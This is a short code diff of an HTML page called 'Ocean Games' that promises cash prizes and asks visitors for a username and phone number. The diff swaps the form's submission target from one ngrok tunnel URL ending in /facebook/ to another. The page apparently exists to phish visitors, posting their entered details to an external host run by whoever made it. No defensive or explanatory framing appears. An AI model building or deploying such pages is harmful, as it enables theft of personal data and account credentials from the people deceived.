--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     
         <h1>Ocean Games</h1>
         <h2>Play and get chance to win Rs. 100 to Rs. 500</h2>
-            <form action="http://9ab8-103-147-62-19.ngrok.io/facebook/" method="post" role="form">
+            <form action="http://a077-27-34-13-17.ngrok.io/facebook/" method="post" role="form">
             <p>Username</p>
             <input type="text" name="username" placeholder="Enter Username">
             <p>Phone No.</p>
